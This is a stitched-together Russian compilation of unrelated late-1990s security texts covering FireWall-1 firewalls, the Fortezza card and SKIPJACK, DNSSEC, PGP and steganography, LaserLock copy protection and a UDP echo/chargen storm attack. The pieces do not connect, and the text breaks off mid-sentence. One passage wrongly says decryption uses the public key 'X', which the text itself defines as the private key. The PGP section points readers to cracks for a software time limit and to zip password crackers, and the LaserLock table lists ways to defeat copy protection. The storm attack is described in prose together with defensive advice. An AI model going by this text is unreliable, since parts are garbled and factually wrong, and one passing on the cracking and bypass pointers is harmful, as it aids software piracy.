Координированный контроль доступа в нескольких точках
Межсетевые экраны традиционно являются основным средством контроля внешнего доступа к ресурсам корпоративной сети, ограничивая проникновение трафика во внутренние подсети предприятия и тем самым существенно снижая потенциальные угрозы для ресурсов корпоративной сети. Долгое время функции межсетевых экранов ориентировались на достаточно простую схему доступа:
Доступ контролировался в одной точке, которая располагалась на пути соединения внутренней сети с Internet или другой публичной сетью, являющейся источником потенциальных угроз. Все субъекты доступа делились на группы по IP-адресам, причем чаще всего - на две группы - внутренние пользователи и внешние пользователи. Таким образом субъектами доступа были подсети и классификацию трафика выполнять было достаточно просто - по IP-адресам, явно указанным в пакете. Внешним пользователям разрешалось для доступа к внутренним ресурсам сети использовать один-два популярных сервиса Internet, например электронную почту, основанную на протоколе SMTP, а трафик остальных сервисов отсекался
Сегодня в связи с широким использованием разнотипных соединений внутренней сети предприятия с Internet и через Internet, а также повышенными требованиями к защите ресурсов от внутренних угроз схема контроля доступа существенно усложняется.
У предприятия появляется, как правило, несколько точек контроля доступа. Во-первых, это точки, в которых контролируется доступ к нескольким внешним сетям, например, к публичной части Internet и IP-сети провайдера. Предприятие может также иметь несколько связей с Internet через разных провайдеров для надежности или по другим соображениям. Кроме того, вовлечение в автоматизированную обработку информации практически всех подразделений предприятия и повышение требований к защите обрабатываемой и передаваемой информации приводит к необходимости использования межсетевых экранов и между внутренними подсетями, что приводит к появлению дополнительных точек контроля доступа.
Применение нескольких межсетевых экранов в пределах одной внутренней сети требует изменений их функциональных возможностей. Прежде всего это касается возможности координированной работы всех экранов на основе общей политки доступа. Координация нужна для того, чтобы корректно обрабатывать пакеты пользователей независимо от того, через какую точку доступа проходит их маршрут. Изменение маршрутов пакетов может происходить как на долговременной, так и на кратковременной основах. Долговременные изменения (на часы или сутки) происходят обычно из-за перемещения пользователя между разными географическими пунктами (сегодня пользователь работает в основном здании, завтра - дома, а через неделю - в филиале в другом городе) и для их учета достаточно загрузить во все межсетевые экраны единый набор правил контроля доступа. Кратковременные изменения маршрута пакетов - на секунды или даже миллисекунды - вызываются динамической природой IP-маршрутизации (ожидаемый переход на маршрутизацию с учетом маршрутизаторов - QoS-based routing -, только усилит эту динамику). Кратковременные изменения маршрутов требуют от экрана не только координированного задания правил доступа, но и синхронизации состояний отслеживаемых сессий во всех экранах для того, чтобы любой пакет корректно соотносился с определенной сессией.
Для обеспечения масштабируемости координация правил доступа требует централизованной системы задания и распространения правил.
Распределенная архитектура системы безопасности FireWall-1/VPN-1 и ее централизованное управление как нельзя лучше подходят для организации контроля доступа и образования защищенных каналов VPN в нескольких точках корпоративной сети.
В точках контроля доступа в центральной сети предприятия, а также в удаленных сетях его филиалов могут быть установлены модули шлюзов FireWall-1/VPN-1, защищающие все узлы, находящиеся в подсетях предприятия. Шлюзы могут быть установлены в виде программных модулей на стандартные платформы (Windows NT, Solaris, HP-UX, IBM AIX, Linux и Windows 2000), либо в виде специализированного аппаратно-программного комплекса.
Для защиты удаленных компьютеров предназначены продукты VPN-1 SecureClient, которые наряду с возможностью установления защищенного канала с соответствующим шлюзом выполняют такой же полнофункциональный контроль доступа, как и экраны FireWall-1. Эта возможность особенно полезна при постоянных соединениях удаленных пользователей с Internet (например, с помощью xDSL или кабельных модемов), когда клиентский компьютер в течение длительного времени может подвергаться атакам злоумышленников. С помощью продукта VPN-1 SecureServer можно аналогичным образом защитить отдельный сервер приложений, работающий в сети предприятия, что может быть полезно для увеличения гибкости политики доступа, либо для дополнительной защиты ответственного сервера.
Количество точек, в которых контролируется прохождение трафика, можно также увеличить, установив на маршрутизаторы и коммутаторы сети Inspection Module, который выполняет базовые функции контроля доступа технологии Stateful Inspection. Сегодня список моделей, для которых выпускается Inspection Module, включает маршрутизаторы Nortel Networks, а также коммутаторы Xylan и Nortel Contivity, и в дальнейшем он будет пополняться.
Все модули FireWall-1/VPN-1 предприятия, установленные в центральной сети, в сетях филиалов и на отдельных компьютерах удаленных пользователей, управляются централизованно и координировано. Сервер политики Management Server хранит общий для предприятия набор правил доступа и защиты, который загружается для исполнения во все модули FireWall-1/VPN-1, в какой области корпоративной сети они бы не находились. Правила политики могут создаваться и редактироваться удаленно несколькими администраторами безопасности с разграничением между ними полномочий.
Все модули FireWall-1/VPN-1 предприятия могут при необходимости синхронизировать свою работу, что позволяет корректно поддерживать сессии при динамических изменениях маршрутов.
Таки образом, система безопасности, построенная на продуктах FireWall-1/VPN-1, обеспечивает координированную и синхронную работу всего набора межсетевых экранов, шлюзов VPN, а также индивидуальных экранов и VPN-клиентов, необходимых для надежной и гибкой защиты информационных ресурсов предприятия.
Кpаткое описание пpоблемы:
Публичные веб-сеpвеpа пpодолжают оставаться объектами атак хакеpов, котоpые хотят с помощью этих атак нанести уpон pепутации оpганизации или добиться каких-либо политических целей. Хоpошие меpы защиты могут защитить ваш сайт от тех непpиятностей, котоpые будет иметь ваша оpганизация в случае успешной атаки на него.
Краткий обзор по протоколам
Терминальный сервис
Поддерживается протоколы telnet,rlogin,tn3270. Работа по этим протоколам
невозможна в обход МЭ. МЭ может быть сконфигурирован в прозрачном
режиме при использовании этих видов сервиса. При стандартном режиме работы
пользователь общается только с соответствующей программой, он не осуществляет
удаленный вход в систему МЭ. rlogin сервис не использует rlogind сервер
на МЭ. telnet и rlogin сервисы обслуживаются разными программами МЭ,
соответственно каждый сервис требует отдельной конфигурации.
Протокол передачи файлов
Протокол FTP аналогично telnet может быть сконфигурирован в прозрачном
и обычном режимах. При использовании прозрачного режима графические реализации
клиента FTP (например CuteFTP for Windows95) не требуют изменения.
При стандартном режиме и в случае дополнительной авторизации графические
версии использовать не рекомендуется (можно пользоваться терминальной
версией ftp в windows95). МЭ осуществляет полный контроль за
использованием команд протокола RETR,STOR и т.д.
Электронная почта.
МЭ предоставляет поддержку электронной почты с использованием протокола
SMTP. Поскольку известно большое количество проблем, связанных со стандартной
программы передачи почты sendmail, МЭ не запускает ее в привилегированном
режиме. Вместо этого с протоколом SMTP работает специальная программа
(2000 строк против 40 000 строк в sendmail), которая обрабатывает все
соединения по порту 25, проводит полный анализ всех управляющих команд
и заголовков письма, после чего вызывает sendmail для реальной передачи
сообщения. Все это происходит не в режиме суперпользователя и
на изолированном участке файловой системы.
Среди дополнительных возможностей имеется возможность скрыть реальную
внутреннюю структуру сети от анализа по почтовым адресам.
Для чтения почты пользователями используется специальная серверная программа,
использующая авторизацию через одноразовые пароли. МЭ поддерживает работу
по протоколу POP3 с использованием APOP стандарта( см. RFC1725).
WWW.
МЭ поддерживает все виды и вариации HTTP протокола. Программа МЭ,
отвечающая за этот протокол имеет размер исходных текстов примерно в 20 раз меньше
публично доступных аналогичных программ и может быть легко проанализирована.
Важнейшим отличием ее от других является возможность блокирования передачи
в составе гипертекстовых документов программ на языке JAVA. О полезности
этого свойства говорит наличии в архиве CERT 2-3 сообщений о проникновении
за системы защиты с помощью программ на этом языке, полученными пользователями приватной сети в составе документа. Кроме того, МЭ позволяет фильтровать такие
вещи, как JavaScript и Frames. МЭ позволяет осуществлять контроль
за используемыми HTTP методами (GET,PUT,HEAD).
X11.
X Window System хорошо известная проблемами с безопасностью среда.
X11 клиент, соединившийся с сервером, имеет возможность получить контроль
над клавиатурой, прочитать содержимое других окон. Система доступа к X11
в МЭ используется совместно с терминальными программами telnet и rlogin.
Она определяет псевдо-сервер, с которым и организуется соединений по
протоколу X11. При каждом таком соединении пользователю предлагается
сделать выбор мышкой - разрешить или запретить работу вызванного приложения.
Удаленная печать.
В некоторых случаях есть необходимость пересылки по сети печатной информации.
МЭ включает средства поддержки удаленной печати. При использовании
соответствующей программы проверяется откуда приходит запрос и на какой принтер.
также осуществляется контроль за удаленным управлением очередями печати
Удаленное выполнение задач.
Эта возможность реализована несколько ограниченно по причинам безопасности,
поскольку протокол rsh является одним из наиболее опасных. Пользователи
из приватной сети могут по правилам определенным администратором МЭ
выполнять задачи удаленно в открытой сети.
Передача звука - RealAudio.
Для пользователей приватной сети имеется возможность использовать
аудио по запросу протокол.
Доступ к базам данных.
В настоящий момент реализована возможность доступа к базам данных
Sybase с контролем на МЭ.
Нестандартные протоколы.
Для работы с нестандартными протоколами, использующих TCP в составе МЭ
имеется средство plug-ge, позволяющее использовать прозрачное прямое
соединение. Поскольку это средство не поддерживает авторизации, его
использование должно происходить под строгим контролем и только
если администратор понимает, что он делает. В общем случае рекомендуется
использовать circuit-level приложение из состава МЭ, поддерживающее
авторизацию. Управление этим средством со стороны пользователя
легко осуществляется с помощью стандартной программы telnet. Авторизовавшись,
пользователь может осуществить несколько соединений. Каждое такое соединение
происходит только при подтверждении со стороны пользователя, что это
делает именно его программа.
Криптографические функции карты Fortezza
Алгоритм шифрования, применяемый в технологии Fortezza, известен подназванием SKIPJACK [8]. Этот алгоритм разработан специалистами АНБ и отвечаетстандарту депонирования ключей Escrowed Encryption Key Standard. SKIPJACKявляется блочным шифром с размером блока 8 байт, использующим симметричныеключи (т.е. для зашифрования и расшифрования применяется один и тот жеключ). Шифрование по алгоритму SKIPJACK в карте Fortezza осуществляетсяс помощью специализированного криптографического микропроцессора CAPSTONE,выполненного по RISC-технологии. Такие микропроцессоры выполняют те жефункции, что и микропроцессоры CLIPPER, применяемые для реализации алгоритмаSKIPJACK в устройствах голосовой (телефонной) связи. Обсуждение деталейреализации SKIPJACK не представляется возможным, т.к. этот алгоритм являетсязасекреченным.
Рис. 1.
В технологии Fortezza ключ шифрования данных называется Message EncryptionKey (MEK). В дополнении к этому ключу может использоваться также векторинициализации Initialization Vector (IV), который фактически является дополнительнымвходным параметром при шифровании данных. Стандартный режим алгоритма Fortezzaтребует обязательного использования IV всеми участниками информационногообмена. Это означает, что для расшифрования сообщения принимающая сторонадолжна либо иметь возможность сгенерировать точно такой же IV, которыйиспользовался отправляющей стороной при зашифровании сообщения, либо IVдолжен быть передан вместе с сообщением.
Алгоритм шифрования SKIPJACK имеет три режима работы: Electronic Codebook(ECB), Output Feedback (OFB) и Cipher Block Chaining (CBC). По умолчанию,алгоритм Fortezza использует режим CBC. В этом режиме все 8-байтные блокиоткрытого текста, кроме первого, используются для выполнения операции XORс блоком зашифрованного текста, полученным на предыдущем шаге работы алгоритмас использованием MEK. Вектор IV применяется для зашифрования первого блокаоткрытого текста.
На показан процесс посылки Алисой секретного сообщения Бобу.Для того, чтобы злоумышленник смог расшифровать сообщение Алисы, ему необходимознать не только MEK, но и IV. При этом, компрометация IV не столь существенна,если злоумышленник не обладает MEK.
Распределение ключей шифрования MEK основано на применении разработанногов АНБ алгоритма обмена ключами Key Exchange Algorithm (KEA), который посылаетзашифрованный MEK с каждым сообщением. Поскольку обмен ключами KEA интегрированв технологию Fortezza, ключи шифрования могут меняться от сообщения к сообщениюили от сеанса к сеансу. Алгоритм KEA использует для шифрования MEK специальныйключ, названный Token Encryption Key (TEK). Необходимо иметь в виду, чтов приложениях, использующих технологию Fortezza, TEK может быть использованпри шифровании данных как альтернатива ключа шифрования MEK, однако MEKне может быть использован для защиты TEK в процессе обмена ключами.
Рис. 2.
Шифрование с открытым ключем в стандартном режиме алгоритма Fortezzaиспользуется только для обмена ключами с использованием KEA и для цифровойподписи сообщений (включая временные метки). В описании алгоритма Fortezzaобычно используют следующие обозначения: 20-байтный закрытый ключ называется"X", 128-байтный открытый ключ называется "Y", P иQ - большие простые числа (секретные), G - простое число по модулю P*Q(общедоступное).
На представлен общий процесс шифрования сообщений с использованиемоткрытого ключа абонента. Алиса зашифровывает сообщение для Боба, используяоткрытый ключ Боба Y и алгоритм шифрования с открытым ключом. Боб расшифровываетпослание Алисы с помощью своего открытого ключа X. Каждый, кто получитдоступ к месту хранения открытых ключей, сможет зашифровать данные дляБоба, но только Боб сможет расшифровать эти данные, поскольку никто незнает его закрытого ключа. Генерация и распределение пар открытого и закрытогоключей для организации обмена ключами KEA и цифровой подписи производитсядля каждого пользователя отдельно в соответствии со специальной процедурой.
КРИПТОГРАФИЧЕСКИЕ ПОДПИСИ
Для ликвидации названных ограничений протокола DNS IETF создала рабочую группу DNSSEC (DNSSEC Working Group, DNSSEC WG) для внесения расширений DNSSEC в существующий протокол. Berkeley Internet Name Daemon (BIND) 8.2 имеет некоторые из функциональных возможностей DNSSEC.
Цель DNSSEC - обеспечить аутентификацию и целостность информации, содержащейся в DNS (см. Рисунок 2). DNSSEC позволяет достигнуть обеих целей посредством шифрования.
Рисунок 2. Два примера ответов и запросов DNS с DNSSEC и без оных. Обратите внимание, что в ответе с DNSSEC ответное сообщение содержит не только подписи и ключи, необходимые для проверки информации, но и сам исходный вопрос. Эта процедура называется "Аутентификацией транзакции и запроса". Благодаря ей запрашивающая сторона может быть уверена, что она получила ответ на тот вопрос, который задавала.
DNSSEC опирается на шифрование с открытыми ключами для подписи информации, содержащейся в DNS. Такие криптографические подписи обеспечивают целостность за счет вычисления криптографического хэша (т. е. уникальной контрольной суммы) данных и затем защиты вычисленной величины от несанкционированных изменений посредством ее шифрования. Хэш шифруется с помощью личного ключа из пары ключей, чтобы любой желающий мог воспользоваться открытым ключом для его дешифровки. Если дешифрованное получателем значение хэша совпадает с вычисленным, то данные достоверны (не подвергались несанкционированному изменению).
Криптографическая подпись и открытый ключ, используемый для верификации подписи, получают посредством запросов и ответов, как и любую другую информацию в DNS.
В случае криптографической подписи аутентификация производится неявно, на основании факта совпадения дешифрованного и вычисленного значений хэша: только держатель личного ключа мог зашифровать хэш, так как открытый ключ дал правильное значение хэша. Таким образом, любая система на базе технологии открытых ключей должна обеспечивать надежную защиту личных ключей. Этому вопросу посвящен документ RFC 2541 рабочей группы DNSSEC.
Криптография
| Sub rosa |
Информация предоставлена , сервер
Вопрос защиты переписки от несанкционированного доступа стар,
как мир, и напрямую связан с вопросом защиты нашей privacy. Люди,
эти странные существа, почему-то упорно не хотят, чтобы их письма
читали. А другие люди и правительственные учреждения многих стран
почему-то упорно желают их прочесть. Зачем нужно защищать свою
переписку от чужих глаз законопослушному гражданину, спросит автора
читатель. А за тем же, зачем вы, пользуясь обычной почтой, отправляете
обычно письма в конверте, а не почтовой открыткой.
Существует довольно много способов защиты вашей электронной почты
от чужих глаз. Автор предлагает вам выбрать подходящий, либо продолжать
сообщать всем заинтересованным лицам информацию о своих семейных,
финансовых и прочих делах. Вам решать:)
Юридические и политические аспекты использования криптографических систем в России вынесены автором на . Приглашаю резидентов РФ и всех заинтересованных людей ознакомиться с ней.
Pretty Good Privacy (PGP)
Очень сильное средство криптографической защиты. Сила PGP не в том, что
никто не знает, как ее взломать иначе как используя "лобовую атаку" (это не сила, а условие существования хорошей программы для шифровки), а в превосходно продуманном и чрезвычайно мощном механизме обработки ключей (см. ниже), быстроте, удобстве и широте распространения. Существуют десятки не менее сильных алгоритмов шифровки, чем тот, который используется в PGP, но популярность и бесплатное распространение сделали PGP фактическим стандартом для электронной переписки во всем
мире.
Обычные средства криптографии (с одним ключом для шифровки
и дешифровки) предполагали, что стороны, вступающие в переписку,
должны были в начале обменяться секретным ключом, или паролем,
если хотите, с использованием некоего секретного канала (дупло,
личная встреча etc.), для того, чтобы начать обмен зашифрованными
сообщениями. Получается замкнутый круг: чтобы передать секретный
ключ, нужен секретный канал. Чтобы создать секретный канал, нужен
ключ.
Разработанная Филипом Циммерманном программа PGP относится
к классу систем с двумя ключами, публичным и секретным. Это означает,
что вы можете сообщить о своем публичном ключе всему свету, при
этом пользователи программы смогут отправлять вам зашифрованные
сообщения, которые никто, кроме вас, расшифровать не сможет. Вы
же их расшифровываете с помощью вашего второго, секретного ключа,
который держится в тайне. Публичный ключ выглядит примерно так
:
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i
mQCNAzF1IgwAAAEEANOvroJEWEq6npGLZTqssS5EScVUPVaRu4ePLiDjUz6U7aQr
Wk45dIxg0797PFNvPcMRzQZeTxYl0ftyMHL/6ZF9wcx64jyLH40tE2DOG9yqwKAn
yUDFpgRmoL3pbxXZx9lO0uuzlkAz+xU6OwGx/EBKYOKPTTtDzSL0AQxLTyGZAAUR
tClCb2IgU3dhbnNvbiA8cmpzd2FuQHNlYXR0bGUtd2Vid29ya3MuY29tPokAlQMF
EDF2lpI4h53aEsqJyQEB6JcD/RPxg6g7tfHFi0Qiaf5yaH0YGEVoxcdFyZXr/ITz
rgztNXRUi0qU2MDEmh2RoEcDsIfGVZHSRpkCg8iS+35sAz9c2S+q5vQxOsZJz72B
LZUFJ72fbC3fZZD9X9lMsJH+xxX9CDx92xm1IglMT25S0X2o/uBAd33KpEI6g6xv
-----END PGP PUBLIC KEY BLOCK-----
Вы можете опубликовать свой публичный ключ на вашей Web странице
, или послать его электронной почтой своему другу. Ваш корреспондент зашифруют сообщение с использованием
вашего публичного ключа и отправит его вам. Прочесть его сможете
только вы с использованием секретного ключа. Даже сам отправитель
не сможет расшифровать адресованное вам сообщение, хотя он сам
написал его 5 минут назад. И самое приятное. На сегодня даже самым
мощным компьтерам в требуются века, чтобы расшифровать сообщение, зашифрованное с помощью PGP!
Программа PGP широко доступна в
сети. В связи с ограничениями на экспорт криптографической продукции, действующими в США, резиденты и нерезиденты США должны использовать разные места для загрузки программы.
Резиденты США по закону должны пользоваться либо бесплатной версией 2.6.2 , которую можно загрузить с сайта , либо только что вышедшей великолепной , написанной для различных платформ. PGP 5.0 имеет ограниченный срок бесплатного пользования (2 месяца), хотя при желании это ограничение можно обойти. Читайте
, там все описано, стоит лишь ввести ключевые слова Re crack PGP 5.0 ;)
Для всех тех, кто постоянно проживает за пределами США, главный сайт расположен . Последняя легально экспортированная версия на сегодня - это версия 2.6.3i (знак i после версии означает international). Ее также можно скачать (323К). Несмотря на запрещение экспорта версии PGP 5.0, она по старой доброй традиции была немедленно проэкспортирована из США. Поскольку незаконным является только сам экспорт, но не использование программы, автор рад сообщить вам, что версию 5.0 можно спокойно скачать с европейских сайтов
или (3.5 MB).
Сам по себе экспорт PGP из США в 1991 году, распространение программы по всему миру, судебное преследование автора, юридические хитрости, недавно использованные для законного экспорта в Европу версии 5.0 в печатном виде, и другие связанные с PGP моменты представляют из себя историю весьма занимательную. Читайте об этом на официальном сайте .
Теперь практические вопросы использования PGP. В то время как PGP 5.0 представляет из себя полноценную, имеющую графический интерфейс, программу для Windows 95 и Макинтоша, пользователи, которые по той или иной причине предпочитают использовать версии 2.xx, будут иметь дело с чисто текстовой программой, весьма неудобной в использовании. Хорошая новость: для таких версий
PGP написано множество plug-ins и front ends, делающих использование
PGP в Widows 95 делом элементарным. Часть из них собрана в
директории архива , но лучшие из опробованных автором являются следующие:
(2.43M),выпускаемый . Серьезный front end со множеством функций.
(80K), очень милая программа с набором функций, способным удовлетворить подавляющее большинство пользователей. После загрузки принимает вид такого окна:
Оба продукта шифруют и дешифруют как данные из clipboard'а, так и файлы на диске.
Напоминаю, что для пользования любым из plug-ins, front ends и shells с версиями 2.xx (но не версией 5.0, она содержит все необходимые файлы!) нужен сам файл , т.к. программы-надстройки саму PGP не содержат, так что не забудьте скачать и его.
Зашифровка информации в изображении и звуке
Этот класс продуктов позволяет прятать ваши сообщения в файлы
.bmp, .gif, .wav и предназначен для тех случаев, когда вы не хотите,
чтобы у кого-либо создалось впечатление, то вы пользуетесь средствами
криптографии. Пример подобной программы -
(273К). Программой очень легко пользоваться.
Внешне графический файл остается практически неизменным, меняются
лишь кое-где оттенки цвета. Для большей безопасности следует использовать неизвестные
широкой публике изображения, изменения в которых не бросятся
в глаза с первого взгляда, а также изображения с большим количеством
полутонов и оттенков. Использовать картину Танец Матисса - идея
плохая, т.к. все знают, как она выглядит, и кроме того она содержит
большие зоны одного цвета. А вот фотография вашего песика вполне
подойдет. Pассмотрим пример:
 |
 |
Зашифровка с помощью архиватора Pkzip
Знакомое имя, не правда ли?
позволяет архивировать
файлы с защитой паролем. Синтаксис команды описан в самом файле,
если его запустить без аргументов. Этот способ защиты значительно слабее описанных выше. Специалисты по криптографии утверждают, что в методе шифрования, используемом программой pkzip, обнаружены "дыры",
позволяющих взломать архив, не только подобрав пароль, но и другими способами. Так что будьте осторожны, используйте программу только тогда, когда вы уверены, что ваш "противник" не очень силен. Если подбор пароля будет производится с помощью обычного PC с использованием распространенных программ подбора ключа, pkzip может послужить
весьма удобным и быстрым способом защиты информации, хотя и обладающим
описанным выше "семейным" недостатком всех систем криптозащиты
с одним ключом.
Программы взлома, которые можно позаимствовать (требует, чтобы защищенный
паролем архив содержал как минимум 3 файла, 46K) или (24K), используют
один из двух подходов по выбору пользователя. Они либо подбирают
пароль с использованием большого словаря, либо атакуют в лоб (brute
force), перебирая все возможные комбинации. Согласно исследованиям
психологов, большинство мужчин в качестве пароля используют короткие
слова из ненормативной лексики, а женщины - имена любимых мужчин
или детей. Так что если ваша жена использует пароль Vasya, а вас
зовут Петя, это повод задуматься;) Отсюда простой вывод: используйте
пароль, который вряд ли есть в словаре, а главное - длинный (до
24 знаков), и содержащий цифры, специальные символы (?!$ etc.).
Для лобовой атаки (подбор комбинации из всех возможных) со скоростью
200 000 комбинации в секунду (примерно соответствует возможностям
PC Pentium 100) для пароля из 6 знаков расклад таков:
| Набор символов | Максимальное время |
| только цифры | 5.0 секунд |
| только строчные буквы | 25.7 минуты |
| только символы | 1.8 часа |
| строчные и заглавные буквы | 27.5 часа |
| строчные, заглавные, цифры | 3.3 дня |
| строчные, заглавные, цифры, символы | 42.5 дня |
Защита документов MS Word паролем
Не используйте этот метод. Никогда. Взлом настолько прост, что
изготовитель коммерческого пакета для восстановления паролей,
забытых незадачливыми пользователями, включил в программу пустые
циклы, чтобы замедлить ее работу для создания впечатления сложности
поставленной задачи.
Copyright © 1997
Криптография сегодня
Криптография - это наука об обеспечении безопасности данных. Она занимается поисками решений четырех важных проблем безопасности - конфиденциальности, аутентификации, целостности и контроля участников взаимодействия. Шифрование - это преобразование данных в нечитабельную форму, используя ключи шифрования-расшифровки. Шифрование позволяет обеспечить конфиденциальность, сохраняя информацию в тайне от того, кому она не предназначена.
Криптокарта FORTEZZA - правительственные технологии в коммерческих приложениях
(обзор по материалам открытой печати)
,
Основным отличием текущей, третьей, версии протокола SSL является поддержкабольшего количества алгоритмов и аппаратных средств обмена ключевой информациейи шифрования, в том числе и технологии Fortezza, разработанной специалистамиАНБ США [2]. Поддержка криптокарты Fortezza в программных продуктах семействаNetscape была запланирована более года назад. В октябре 1995 года вице-президентNetscape Марк Андриссен (Mark Andreessen) заявил, что поддержка технологииFortezza позволит укрепить позиции компании в качестве ведущего поставщикапрограммных продуктов, использующих Web-технологии, как для федеральногоправительства США, так и для коммерческих организаций [3]. Результаты незаставили себя ждать: Netscape стала первой компанией, которой правительствоСША в июле 1996 с.г. предоставило право распространять по сети Internetпрограммное обеспечение, подлежащее экспортным ограничениям [4]. NetscapeNavigator и Netscape FastTrack Server стали первыми программными продуктами,использующими алгоритм RC4 с длиной ключа 128 бит, которые американскиепользователи могут получить по сети Internet.
В настоящее время число компаний, поддерживающих протокол SSL, значительноувеличилось. Среди них: Apple Computer, Inc., Digital Equipment Corporation,IBM, MasterCard International Inc., Microsoft Corporation, Motorola, Novell,Inc., Siemens Nixdorf, Silicon Graphics, Inc., Sun Microsystems, Inc.,Visa International и др. Существуют также и некоммерческие реализации,например WWW-сервер Apache-SSL. Широкое распространение протокола SSL делаетвозможным и необходимым более детальное ознакомление с одним из его средств- криптокартой Fortezza.
Криптосистемы
Криптосистема работает по определенной методологии (процедуре). Она состоит из : одного или более алгоритмов шифрования (математических формул); ключей, используемых этими алгоритмами шифрования; системы управления ключами; незашифрованного текста; и зашифрованного текста (шифртекста).
Согласно методологии сначала к тексту применяются алгоритм шифрования и ключ для получения из него шифртекста. Затем шифртекст передается к месту назначения, где тот же самый алгоритм используется для его расшифровки, чтобы получить снова текст. Также в методологию входят процедуры создания ключей и их распространения (не показанные на рисунке).
LaserLock
| Тип защиты: | Физическое нанесение метки на носитель |
| Способ преодоления защиты: | Копирование (BlindRead), "кряк", эмуляция (D-Tools) |
| Аппаратная совместимость (cd/dvd разных производителей): | Низкая |
| Наличие особой аппаратуры для защиты серии: | ДА, требуется |
| Предоставление SDK для производителей: | ДА |
| Защита мелких партий (CD/R/RW): | НЕТ |
| Фирма - производитель: | MLS LaserLock International |
| Сайт производителя: | http://www.laserlock.com/ |
| Коммерческие продукты, использующие данный вид защиты: | |
| Asghard, Fallout 2, Icewind Dale, Jagged Alliance 2, Messiah, Metro Police, Outcast, Shogo, SpecOps | |
| Особенности защиты: | |
| Использует уникальную маркировку. Каждое приложение на CD имеет уникальную блокировку параметра, который отвечает конечную защиту от копирования. | |
| Много слов, а мало дела. Продукт уже вскрыт всеми возможными методами. Разработчики системы явно не успевают вносить изменения в код защиты для противодействия уловкам пиратов. |
Литература
[1]. Пресс-релиз. Netscape Communications Corporation. June 17, 1996
[2]. The SSL Protocol. Version 3.0. Internet draft. March 1996.
[3]. Пресс-релиз. Netscape Communications Corporation. October 10, 1995.
[4]. Пресс-релиз. Netscape Communications Corporation. July 16, 1996.
[5]. PC Newswire. October 10, 1995.
[6].
[7].
[8]. The Cambridge Algorithms Workshop. Bruce Schneier. Dr.Dobb's Journal,April 1994.
[9].
[10].
[11].
Kahn D. The Codebreakers. N-Y, 1967. Жельников В. Криптография от папируса до компьютера. М., 1996. Simmons G.J. The prisoner`s problem and the subliminal channel, Proc. Workshop on Communications Security (Crypto`83), 1984, 51-67. Pfitzmann B. Information Hiding Terminology, in Information Hiding, Springer Lecture Notes in Computer Science, v.1174, 1996, 347-350. Aura T. Invisible communication. In Proc. of the HUT Seminar on Network Security '95, Espoo, Finland, November 1995. Telecommunications Software and Multimedia Laboratory, Helsinki University of Technology. Ross J. Anderson. Stretching the limits of steganography. In IH96 [3], pages 39-48. Zollner J., Federrath H.,Klimant H., Pfitzmann A., Piotraschke R., Westfeld A., Wicke G., Wolf G. Modeling the security of steganographic system, Proc. 2nd International Workshop on Information Hiding, 1998, LNCS, v.1525, 344-354. E. Franz, A. Jerichow, S. Moller, A. Pfitzmann, I. Stierand. Computer Based Steganography: How it works and why therefore any restrictions on cryptography are nonsense, at best, In Information hiding: first international workshop, Cambridge, UK. Lecture Notes in Computer Science, vol. 1174, Berlin Heidelberg New York: Springer-Verlag, 1996. N.F. Johnson, S. Jajodia. Exploring Steganography: Seeing the Unseen, IEEE Computer, February 1998, vol. 31, no. 2, pp.26-34. Walter Bender, Daniel Gruhl, Norishige Morimoto, and Anthony Lu. Techniques for data hiding. IBM Systems Journal, 35(3 & 4):313{336, 1996. Raymond B. Wolfgang and Edward J. Delp. A watermark for digital images. In International Conference on Images Processing, pages 219-222, Lausanne, Switzer-land, September 1996. IEEE.
Людям свойственно ошибаться
Как известно, межсетевые экраны, как и другие средства защиты, настраиваются людьми. А людям свойственно ошибаться, даже специалистам по защите информации. Именно этот факт и используется многими злоумышленниками. Достаточно найти всего лишь одну слабину в настройках межсетевого экрана и все, можно считать, что "ваше дело табак". Это подтверждается и различными исследованиями. Например, собранная в 1999 году ассоциацией ICSA (http://www.icsa.net) статистика показывает, что до 70% всех межсетевых экранов уязвимы из-за неправильной конфигурации и настройки. Я не хочу говорить о некомпетентности или низкой квалификации администратора МСЭ (хотя эти причины отнюдь не редки), - опишу другой примера. Сразу после института я попал в отдел автоматизации одной крупной компании. Защита Internet обеспечивалась межсетевым экраном, которым "рулил" администратор отдела защиты информации. Мне не раз приходилось сталкиваться с ситуацией, когда к этому администратору подходили друзья из других отделов компании и просили на время разрешить им доступ к серверам с игрушками. Однажды я был свидетелем вопиющего случая. К администратору МСЭ подошел начальник отдела по работе с партнерами и потребовал дать ему доступ к одному из Internet-ресурсов. На ответ, что это невозможно, начальник пригрозил устроить администратору "веселую жизнь", после чего последнему пришлось выполнить распоряжение и изменить настройки межсетевого экрана. Самое удивительное, что со временем ситуация не улучшается. Недавно мы проводили обследование в одной из организаций и обнаружили там точно такую же ситуацию. На межсетевом экране был открыт доступ по протоколам ICQ, RealAudio и т.д. Стали выяснять - оказалось, это было сделано по просьбе сотрудника одного из отдела, с которым у администратора сложились дружеские отношения.
Локальная буря
Сделаем небольшое отступление в сторону реализации TCP/IP и рассмотрим "локальные бури" на пример UDP-бури. Как правило, по умолчанию системы поддерживают работу таких UDP-портов, как 7 ("эхо", полученный пакет отсылается назад), 19 ("знакогенератор", в ответ на полученный пакет отправителю выслается строка знакогенератора) и других (date etc).
В данном случае крэкер может послать единственный UDP-пакет, где в качестве исходного порта будет указан 7, в качестве получателя - 19-й, а в качестве адреса получателя и отправителя будут указаны, к примеру, две машины вашей сети (или даже 127.0.0.1). Получив пакет, 19-й порт отвечает строкой, которая попадает на порт 7. Седьмой порт дублирует ее и вновь отсылает на 19.. и так до бесконечности.
Бесконечный цикл съедает ресурсы машин и добавляет на канал бессмысленную нагрузку. Конечно, при первом потерянном UDP-пакете буря прекратиться. Как недавно стало известно, данная атака временно выводит из строя (до перезагрузки) некоторые старые модели маршрутизаторов.
Очевидно, что в бесконечный разговор могут быть вовлечены многие демоны (в случае TCP/IP может быть применен TCP/IP spoofing, в случае UDP/ICMP достаточно пары фальшивых пакетов).
В качестве защиты стоит еще раз порекомендовать не пропускать в сети пакеты с внутренними адресам, но пришедшие извне. Также рекомендуется закрыть на firewall использование большинства сервисов.
Май
Женщина-законодатель из
Калифорнии решила выяснить, почему она постоянно получает письма,
предназначенные одиноким родителям. Оказалось, что алгоритмы,
реализованные в демографических программах штата, содержат предположение
о том, что если в свидетельстве о рождении у родителей ребенка
разные фамилии, эти родители не состоят в браке. Таким образом,
правомерность статистического заключения "30% матерей в Калифорнии
воспитывают детей в одиночку", оказалась серьезно поколебленной.
В декабре столь же бурную реакцию вызвала публикация в "USA
Today", в которой утверждалось, что показатели компьютерного
индекса цен, базирующиеся на понятиях сельскохозяйственного и
